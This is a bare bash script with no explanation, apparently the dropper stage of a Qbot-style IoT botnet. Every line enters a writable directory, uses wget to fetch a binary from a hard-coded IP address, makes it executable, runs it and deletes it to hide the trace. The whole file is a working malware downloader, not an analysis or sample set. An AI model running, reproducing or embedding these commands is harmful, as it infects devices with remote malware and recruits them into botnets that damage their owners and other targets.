#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxd; chmod +x qbotxd; ./qbotxd; rm -rf qbotxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxd; chmod +x qbotxdxd; ./qbotxdxd; rm -rf qbotxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxd; chmod +x qbotxdxdxd; ./qbotxdxdxd; rm -rf qbotxdxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxdxd; chmod +x qbotxdxdxdxd; ./qbotxdxdxdxd; rm -rf qbotxdxdxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxdxdxd; chmod +x qbotxdxdxdxdxd; ./qbotxdxdxdxdxd; rm -rf qbotxdxdxdxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxdxdxddx; chmod +x qbotxdxdxdxdxddx; ./qbotxdxdxdxdxddx; rm -rf qbotxdxdxdxdxddx
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxdxdxdxdxd; chmod +x qbotxdxdxdxdxdxdxd; ./qbotxdxdxdxdxdxdxd; rm -rf qbotxdxdxdxdxdxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdxdxdxdxdxdxdxd; chmod +x qbotxdxdxdxdxdxdxdxd; ./qbotxdxdxdxdxdxdxdxd; rm -rf qbotxdxdxdxdxdxdxdxd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotxdddddddddddddddd; chmod +x qbotxdddddddddddddddd; ./qbotxdddddddddddddddd; rm -rf qbotxdddddddddddddddd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/qbotlmfao; chmod +x qbotlmfao; ./qbotlmfao; rm -rf qbotlmfao
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/'xd'; chmod +x 'xd'; ./'xd'; rm -rf 'xd'
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/apache5; chmod +x apache5; ./apache5; rm -rf apache5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.168/telnetp00; chmod +x telnetp00; ./telnetp00; rm -rf telnetp00
